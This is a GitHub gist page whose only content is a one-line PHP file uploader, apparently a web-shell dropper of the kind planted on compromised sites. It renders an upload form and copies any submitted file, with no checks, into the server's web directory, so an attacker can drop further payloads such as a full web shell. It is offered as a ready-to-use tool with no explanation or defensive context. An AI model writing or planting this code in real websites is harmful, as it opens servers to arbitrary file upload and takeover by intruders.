Skip to content

Instantly share code, notes, and snippets.

@islanddog
Created November 2, 2020 23:44
Show Gist options
  • Save islanddog/f20e0ca0e9cef1d70110a8d781eeaa28 to your computer and use it in GitHub Desktop.
Save islanddog/f20e0ca0e9cef1d70110a8d781eeaa28 to your computer and use it in GitHub Desktop.
<?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment